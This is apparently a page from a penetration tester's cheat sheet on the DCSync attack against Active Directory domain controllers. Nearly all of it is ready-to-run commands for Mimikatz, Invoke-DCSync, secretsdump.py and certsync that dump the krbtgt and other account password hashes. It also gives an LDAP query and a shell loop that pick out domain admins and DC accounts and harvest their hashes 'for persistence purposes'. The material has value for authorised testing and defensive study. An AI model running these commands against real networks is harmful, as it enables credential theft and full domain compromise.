DCSync

DS-Replication-Get-Changes + DS-Replication-Get-Changes-All

Tools

Mimikatz

mimikatz # lsadump::dcsync /domain:megacorp.local /user:MEGACORP\krbtgt
mimikatz # lsadump::dcsync /domain:megacorp.local /user:[email protected]

Invoke-Mimikatz

https://github.com/BC-SECURITY/Empire/blob/master/data/module_source/credentials/Invoke-Mimikatz.ps1

PS > Invoke-Mimikatz -Command '"lsadump::dcsync /domain:megacorp.local /user:MEGACORP\krbtgt" "exit"'

Invoke-DCSync.ps1

https://github.com/BC-SECURITY/Empire/blob/master/data/module_source/credentials/Invoke-DCSync.ps1

PS > Invoke-DCSync -GetComputers -Domain megacorp.local -DomainController DC1.megacorp.local

DCSyncer

secretsdump.py

$ secretsdump.py MEGACORP/snovvcrash:'Passw0rd!'@DC1.megacorp.local -dc-ip 192.168.1.11 -just-dc-user 'MEGACORP\krbtgt'
$ secretsdump.py DC1.megacorp.local -dc-ip 192.168.1.11 -just-dc-user 'MEGACORP\krbtgt' -k -no-pass

Targeted DCSync

When performing targeted DCSync (e. g., for persistence purposes) choose the most valuable accounts. One can use the following LDAP query to search for effective domain admins (adminCount=1) as well as DC computer accounts (SERVER_TRUST_ACCOUNT bit or userAccountControl=8192 is set):

(&
	(|
		(&(objectCategory=person)(objectClass=user))
		(&(objectCategory=computer)(objectClass=computer))
	)
	(!(userAccountControl:1.2.840.113556.1.4.803:=2))
	(|
		(adminCount=1)
		(userAccountControl:1.2.840.113556.1.4.803:=8192)
	)
)

$ windapsearch --dc 192.168.1.11 -d megacorp.local -u 'DC1$' --hash fc525c9683e8fe067095ba2ddc971889 -m custom --filter '(&(|(&(objectCategory=person)(objectClass=user))(&(objectCategory=computer)(objectClass=computer)))(!(userAccountControl:1.2.840.113556.1.4.803:=2))(|(adminCount=1)(userAccountControl:1.2.840.113556.1.4.803:=8192)))' --attrs msDS-PrincipalName | grep msDS | awk '{print $2}' | tee high-value-targets.txt
$ for t in `cat high-value-targets.txt`; do secretsdump.py -pwd-last-set MEGACORP/'DC1$'@192.168.2.22 -hashes :fc525c9683e8fe067095ba2ddc971889 -just-dc-user $t | grep aad3b | tee -a high-value-hashes.txt; done
Or
$ secretsdump.py -pwd-last-set MEGACORP/snovvcrash:'Passw0rd!'@DC1.megacorp.local -dc-ip 192.168.1.11 -ldapfilter '(&(|(&(objectCategory=person)(objectClass=user))(&(objectCategory=computer)(objectClass=computer)))(!(userAccountControl:1.2.840.113556.1.4.803:=2))(|(adminCount=1)(userAccountControl:1.2.840.113556.1.4.803:=8192)))' | grep aad3b | tee high-value-hashes.txt

certsync

https://github.com/zblurx/certsync

$ certsync -d megacorp.local -u snovvcrash -p 'Passw0rd!' -dc-ip 192.168.1.11 -ns 192.168.1.11

Last updated 1 year ago